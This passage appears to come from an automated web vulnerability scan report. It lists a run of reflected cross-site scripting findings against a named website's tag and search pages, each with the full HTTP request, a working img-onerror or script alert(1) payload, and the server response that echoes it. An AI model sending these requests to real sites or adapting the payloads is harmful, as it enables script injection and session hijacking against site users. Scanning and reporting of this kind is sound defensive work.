GET /tag/themesc01e4</title><img%20src%3da%20onerror%3dalert(1)>aceb843981f561ffa/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesc01e4</title><img src=a onerror=alert(1)>aceb843981f561ffa/kosmos/search.php</title>
...[SNIP]...

2.4620. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bc01f</title><img%20src%3da%20onerror%3dalert(1)>039a09915a1cb4763 was submitted in the REST URL parameter 3. This input was echoed as bc01f</title><img src=a onerror=alert(1)>039a09915a1cb4763 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosbc01f</title><img%20src%3da%20onerror%3dalert(1)>039a09915a1cb4763/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosbc01f</title><img src=a onerror=alert(1)>039a09915a1cb4763/search.php</title>
...[SNIP]...

2.4621. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0025<img%20src%3da%20onerror%3dalert(1)>ec8bb56810f8bc06a was submitted in the REST URL parameter 3. This input was echoed as b0025<img src=a onerror=alert(1)>ec8bb56810f8bc06a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosb0025<img%20src%3da%20onerror%3dalert(1)>ec8bb56810f8bc06a/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosb0025<img src=a onerror=alert(1)>ec8bb56810f8bc06a/search.php]</td>
...[SNIP]...

2.4622. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 73080<img%20src%3da%20onerror%3dalert(1)>67623fd77f5 was submitted in the REST URL parameter 3. This input was echoed as 73080<img src=a onerror=alert(1)>67623fd77f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos73080<img%20src%3da%20onerror%3dalert(1)>67623fd77f5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos73080<img src=a onerror=alert(1)>67623fd77f5/search.php]</td>
...[SNIP]...

2.4623. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 66b20</title><img%20src%3da%20onerror%3dalert(1)>acfc2dbf0ae was submitted in the REST URL parameter 3. This input was echoed as 66b20</title><img src=a onerror=alert(1)>acfc2dbf0ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos66b20</title><img%20src%3da%20onerror%3dalert(1)>acfc2dbf0ae/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos66b20</title><img src=a onerror=alert(1)>acfc2dbf0ae/search.php</title>
...[SNIP]...

2.4624. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e98dd<img%20src%3da%20onerror%3dalert(1)>6d9c3f10b46550405 was submitted in the REST URL parameter 4. This input was echoed as e98dd<img src=a onerror=alert(1)>6d9c3f10b46550405 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/search.phpe98dd<img%20src%3da%20onerror%3dalert(1)>6d9c3f10b46550405?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/search.phpe98dd<img src=a onerror=alert(1)>6d9c3f10b46550405]</td>
...[SNIP]...

2.4625. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 19faf</title><img%20src%3da%20onerror%3dalert(1)>0571ac96e533bec4c was submitted in the REST URL parameter 4. This input was echoed as 19faf</title><img src=a onerror=alert(1)>0571ac96e533bec4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/search.php19faf</title><img%20src%3da%20onerror%3dalert(1)>0571ac96e533bec4c?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/search.php19faf</title><img src=a onerror=alert(1)>0571ac96e533bec4c</title>
...[SNIP]...

2.4626. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 6a5cd</title><img%20src%3da%20onerror%3dalert(1)>69bf803fe61 was submitted in the REST URL parameter 4. This input was echoed as 6a5cd</title><img src=a onerror=alert(1)>69bf803fe61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.php6a5cd</title><img%20src%3da%20onerror%3dalert(1)>69bf803fe61?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/search.php6a5cd</title><img src=a onerror=alert(1)>69bf803fe61</title>
...[SNIP]...

2.4627. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6d5d<img%20src%3da%20onerror%3dalert(1)>5fef33f8b5a was submitted in the REST URL parameter 4. This input was echoed as a6d5d<img src=a onerror=alert(1)>5fef33f8b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.phpa6d5d<img%20src%3da%20onerror%3dalert(1)>5fef33f8b5a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/search.phpa6d5d<img src=a onerror=alert(1)>5fef33f8b5a]</td>
...[SNIP]...

2.4628. http://www.resellerbase.com/tag/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 2234e</title><img%20src%3da%20onerror%3dalert(1)>16283c5765e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2234e</title><img src=a onerror=alert(1)>16283c5765e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.php/2234e</title><img%20src%3da%20onerror%3dalert(1)>16283c5765e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/search.php/2234e</title><img src=a onerror=alert(1)>16283c5765e</title>
...[SNIP]...

2.4629. http://www.resellerbase.com/tag/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf2fb<img%20src%3da%20onerror%3dalert(1)>5399e8d38c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf2fb<img src=a onerror=alert(1)>5399e8d38c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.php/bf2fb<img%20src%3da%20onerror%3dalert(1)>5399e8d38c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/search.php/bf2fb<img src=a onerror=alert(1)>5399e8d38c2]</td>
...[SNIP]...

2.4630. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5ed3<script>alert(1)</script>4c1d6e4a794 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga5ed3<script>alert(1)</script>4c1d6e4a794/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga5ed3<script>alert(1)</script>4c1d6e4a794/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4631. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56357<script>alert(1)</script>0b43bf1cdb3e76d6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag56357<script>alert(1)</script>0b43bf1cdb3e76d6b/themes/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag56357<script>alert(1)</script>0b43bf1cdb3e76d6b/themes/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4632. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 69784</title><img%20src%3da%20onerror%3dalert(1)>6543e1ceba3 was submitted in the REST URL parameter 2. This input was echoed as 69784</title><img src=a onerror=alert(1)>6543e1ceba3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes69784</title><img%20src%3da%20onerror%3dalert(1)>6543e1ceba3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes69784</title><img src=a onerror=alert(1)>6543e1ceba3/search.php</title>
...[SNIP]...

2.4633. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 375ff</title><img%20src%3da%20onerror%3dalert(1)>081329ebe7db52d4c was submitted in the REST URL parameter 2. This input was echoed as 375ff</title><img src=a onerror=alert(1)>081329ebe7db52d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes375ff</title><img%20src%3da%20onerror%3dalert(1)>081329ebe7db52d4c/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes375ff</title><img src=a onerror=alert(1)>081329ebe7db52d4c/search.php</title>
...[SNIP]...

2.4634. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e038c<img%20src%3da%20onerror%3dalert(1)>99cea688282 was submitted in the REST URL parameter 2. This input was echoed as e038c<img src=a onerror=alert(1)>99cea688282 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themese038c<img%20src%3da%20onerror%3dalert(1)>99cea688282/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themese038c<img src=a onerror=alert(1)>99cea688282/search.php]</td>
...[SNIP]...

2.4635. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6e9d9<img%20src%3da%20onerror%3dalert(1)>0f2d2fd26e1553399 was submitted in the REST URL parameter 2. This input was echoed as 6e9d9<img src=a onerror=alert(1)>0f2d2fd26e1553399 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

